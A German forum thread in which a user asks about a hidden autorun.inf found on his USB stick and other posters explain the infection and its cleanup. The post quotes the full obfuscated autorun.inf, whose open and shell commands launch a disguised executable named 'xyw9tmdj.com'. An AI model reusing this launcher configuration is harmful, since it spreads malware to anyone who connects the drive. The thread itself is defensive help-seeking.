Frage zu autorun malware

[patrickmb]

Hallo zusammen

Ich hab mal eine Frage zu malware.

Geschichte:
Gestern war ich bei einer Bekannten und hab ihr mit meinem USB Stick ein paar Dateien auf ihren Laptop überspielt. Soweit kein Problem.
Heute steck ich den Stick in meinen Laptop und direkt kommt eine Anti-Vir Warnmeldung (Die genaue habe ich leider nicht mehr).
Auf jeden fall war eine autorun.inf Datei auf meinem Stick (als Systemdatei versteckt). Deren Inhalt hab ich in eine harmlose Textdatei verschoben und die .inf gelöscht.

Meine Frage:
Könnte die Datei von dem anderen Laptop kommen oder war das nur Zufall, dass ich sie ausgerechnet heute entdeckt habe?
Was macht sie? Insbesondere falls sie schon länger auf dem Laptop meiner Bekannten war. Ich vermute mal eine Internetadresse aufrufen und dann weiteres runterladen. Aber was?
Wo könnte ich weitere Informationen darüber bekommen? Nach welchem Stichwort soll ich suchen?

Ich kopiere den Inhalt der autorun.inf einfach mal hierrein und hoffe, dass ich damit nicht gegen irgendeine Forenregel verstoße:

;75oa5ld3dfawa39247q1k0djAoDrC24rp5Ls4la4id5ss5J92df
[AutoRun]
;s3Lwl4cflZD4r0qDIie3lj8a8wUJi62LdFr7Jpfow2isDLjqH1kdKkSosajAaqs35flkj20sjawi0sCq1dJdArak9AsL3K2sirmiwel
open=xyw9tmdj.com
;0aiwa0A5k1loo7rk
shell\open\Command=xyw9tmdj.com
;e43Df9rl1dlie9L4ko1jdqsl4mko2SoSpkLeKe3q3s4KaD3widq5K4U2K8wnsk1CAddlkDw4caklA2iDj2
shell\open\Default=1
;D4jIl4o4poS4okwSlkwJ4DeLeD3f1Klkjqiia2Uda3kSLiedslff5wdAs4wpHisp3aoCiD4l6krkoKJ5sisiqcakd3mKcsA7krA2KAeKik2LsLkk805jfDao91l33s
shell\explore\Command=xyw9tmdj.com
;4wadrq

Vielen Dank für Antworten schonmal im voraus.
Grüße
Patrick

 

[Brunolp12]

ich kann dazu nix sagen, hab aber mal folgendes probiert:

Ergebnisse 1 - 10 von ungefähr 391 für xyw9tmdj.com

die Treffer bringen mich jetzt zwar nicht wirklich weiter, aber so ganz "nix" ists ja auch nicht - vielleicht magst Du ja tiefer eintauchen als ich Bock hab

 

[Gott]

Diese Malware kenne ich, wobei ich nicht genau nachgeforscht habe, was sie macht. Wird die Autorun.inf jedoch nicht vom Antivirus geblockt, sondern ausgeführt, dann ist man infiziert. Leider fand man den Virus im letzten Jahr auf fast jedem Stick/Notebook und allgemein auf allen Wechseldatenträgern in meiner Umgebung.

Wo befindet sich der Virus nach einer Infektion?
- Auf jedem Laufwerk das beschreibbar ist findet man eine autorun.inf
- Weiters wird eine lsass.exe (meistens heißt sie so) im RECYCLER Ordner abgelegt. c:\RECYCLER, d:\RECYCLER, ... (oder Systemdateien einblenden, dann siehst du ihn) Scanne also auch auf deinem USB Stick noch den Recycler Ordner, denn dort befindet sich der eigentliche Virus. Antivir hat bis jetzt nur die Datei für den automatischen Start gelöscht.
- Sollte man infiziert sein (an den autorun.infs erkenntlich), ist ein Fullscan und ein eventueller Wechsel des Antivirenprogramms ratsam.

-> Das ist ein Grund, warum ich für alle Laufwerke, außer dem CD Laufwerk, den Autorun deaktiviert habe.

 

[patrickmb]

Also vielen Dank für die Antworten.

Ich hab jetzt mal alles durchsucht und scannen lassen und dabei nichts gefunden. Ich nehme jetzt einfach mal an, dass Antivir alles geblockt hat und mein PC nicht infiziert ist.

Auf google hätte ich eigentlich auch selbst kommen können
Hat aber eh nicht viel gebracht. Google findet zwar zeimlich viel, aber das meiste auf spanisch. Und die anderen Seiten, die ich mir zu dem Thema angeschaut fand ich nicht wirklich hilfreich.

Naja. Zwei Fragen hab ich noch:
Könnte dieser Virus die Internet/WLan Verbindung verlangsamen?
Auf meinem USB Stick find ich keinen Recycler Ordner. Gibts den evtl. nur bei NTFS Laufwerken (USB Stick hat FAT)? Meine Festplatte(npartitionen) haben alle NTFS und da sehe ich diesen Ordner auch. Versteckte Dateien, Systemdateien anzeigen ist aktiviert.

Autorun hab ich jetzt auch deaktiviert. Andernseits wars gut, dass er noch aktiviert war sonst hätte ich den Virus noch was weiß ich wo hingetragen.

 

[Gott]

Könnte dieser Virus die Internet/WLan Verbindung verlangsamen?

Wie gesagt, ich kenne den Virus nicht und kenne deshalb auch nicht seine Auswirkungen. Theoretisch könnte die Netzwerkverbindung durch Viren/Trojaner/Adware/... beeinträchtigt werden. Aber ich würde mir darüber keinen Kopf machen. Bei Wlan gibt es immer wieder Schwankungen .

Auf meinem USB Stick find ich keinen Recycler Ordner. Gibts den evtl. nur bei NTFS Laufwerken (USB Stick hat FAT)? Meine Festplatte(npartitionen) haben alle NTFS und da sehe ich diesen Ordner auch. Versteckte Dateien, Systemdateien anzeigen ist aktiviert.

Stimmt, den gibts glaube ich erst seit NTFS. (hängt glaube ich mit den Zugriffsrechten zusammen, jeder Benutzer bekommt einen eigenen Recycler) Scan am besten den kompletten Stick und er sollte sauber sein.

Andernseits wars gut, dass er noch aktiviert war sonst hätte ich den Virus noch was weiß ich wo hingetragen.

Normalerweise sannen Antivirusprogramme Systembereiche und co. von neuen Datenträgern. Mein Antivirusprogramm erkannte den Virus auch als der Autorun deaktiviert war.

 

[patrickmb]

Bei der Frage nach dem WLan gings darum, dass die anderen drei in der Wohnung eine "normale" Geschwindigkeit haben und meine Bekannte nur eine seeeehr langsame (auch wenn nur einer die Verbindung nutzt und auch bei Kabel). Also hat sich der Virus da festgesetzt. Muss dann nochmal mit ihr reden.

Den Stick hab ich natürlich direkt mitkontrolliert.

Ich weiß nicht, wie mein Antivirenprogramm reagieren würde. Bisher hatte ich noch keine Probleme. Werde es aber nicht darauf anlegen bzw es ausprobieren.

 

[Gott]

Also wenn die Verbindung auch per Lan langsam ist, dann könnte da durchaus etwas auf dem Rechner sein. Es kann aber auch an einem zugemüllten System liegen. ^^